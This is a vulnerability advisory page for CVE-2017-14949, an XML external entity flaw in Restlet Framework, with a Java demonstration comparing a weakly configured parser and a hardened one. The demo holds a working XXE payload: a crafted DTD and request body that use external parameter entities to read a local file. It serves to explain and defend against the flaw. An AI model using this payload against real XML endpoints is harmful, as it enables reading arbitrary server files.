CVE-2017-14949
Severity
HIGH
Restlet Framework < 2.3.12 - XML External Entity Injection via REST API HTTP Request
Title source: llmDescription
Restlet Framework before 2.3.12 allows remote attackers to access arbitrary files via a crafted REST API HTTP request that conducts an XXE attack, because the XML parsers it configures disable only external general entities, not external parameter entities. This is related to XmlRepresentation, DOMRepresentation, SaxRepresentation, and JacksonRepresentation.
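The following is an added example (not Restlet's own code) that shows in plain JAXP what the description means: a parser on which only `external-general-entities` is switched off still fetches external parameter entities, so a request body can pull an arbitrary local file into the DTD and surface it through an ordinary internal entity, whereas a parser that refuses the DOCTYPE altogether rejects the body before any entity is resolved. The class and method names are hypothetical, the secret file and the "attacker" DTD are constructed fixtures written to a temp directory, and a local `file:` URL stands in for the remotely hosted DTD an attacker would normally use.

```java
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;

import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;

import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

public class XxeParameterEntityDemo {

    /** Mirrors the pre-2.3.12 mistake the CVE text describes: only external general entities are off. */
    static DocumentBuilderFactory generalEntitiesOnly() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        // external-parameter-entities and load-external-dtd keep their defaults (true)
        return f;
    }

    /** Hardened: refuse DOCTYPE outright, and turn off both entity classes as defence in depth. */
    static DocumentBuilderFactory hardened() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f;
    }

    /** Parse a request body the way a representation class would, and return the root element's text. */
    static String parse(DocumentBuilderFactory f, String body) throws Exception {
        Document doc = f.newDocumentBuilder().parse(new InputSource(new StringReader(body)));
        return doc.getDocumentElement().getTextContent();
    }

    public static void main(String[] args) throws Exception {
        // Constructed fixtures: a "secret" file on the server, and the DTD an attacker
        // would host remotely (a local file stands in for it here).
        Path dir = Files.createTempDirectory("xxe-demo");
        Path secret = dir.resolve("secret.txt");
        Files.write(secret, "SECRET-TOKEN-4242".getBytes(StandardCharsets.UTF_8));

        // Only parameter entities (%name;) do the file access. The one general entity,
        // &leak;, is internal, so blocking *external* general entities does not stop it.
        String evilDtd =
            "<!ENTITY % file SYSTEM \"" + secret.toUri() + "\">\n" +
            "<!ENTITY % wrap \"<!ENTITY leak '%file;'>\">\n" +
            "%wrap;\n";
        Path dtd = dir.resolve("evil.dtd");
        Files.write(dtd, evilDtd.getBytes(StandardCharsets.UTF_8));

        // The crafted request body: its internal subset only references the external DTD.
        String requestBody =
            "<?xml version=\"1.0\"?>\n" +
            "<!DOCTYPE data [\n" +
            "  <!ENTITY % remote SYSTEM \"" + dtd.toUri() + "\">\n" +
            "  %remote;\n" +
            "]>\n" +
            "<data>&leak;</data>";

        // Vulnerable configuration: the secret file's contents come back as element text.
        System.out.println("general-entities-only: " + parse(generalEntitiesOnly(), requestBody));

        // Hardened configuration: the DOCTYPE is rejected before any entity is resolved.
        try {
            parse(hardened(), requestBody);
        } catch (SAXParseException e) {
            System.out.println("hardened: rejected (" + e.getMessage() + ")");
        }
    }
}
```

Disallowing the DOCTYPE is the setting that actually closes the hole; the two `external-*-entities` features and `load-external-dtd` are kept as belt-and-braces for parsers that must accept a DTD. When reviewing a fix, check both entity features and not just the general one, which is exactly the gap this CVE records.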
References (2)
- https://github.com/restlet/restlet-framework-java/wiki/XEE-security-enhancements (Third Party Advisory)
- https://lgtm.com/blog/restlet_CVE-2017-14949 (Exploit, Third Party Advisory)
Scores
CVSS v3
7.5
EPSS
0.0241
EPSS Percentile
81.9%
Attack Vector
NETWORK
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Details
CWE
CWE-611
Status
published
Products (2)
org.restlet.jse/org.restlet (Maven)
>= 0, < 2.3.12
restlet/restlet
< 2.3.12
Published
Nov 30, 2017
Tracked Since
Feb 18, 2026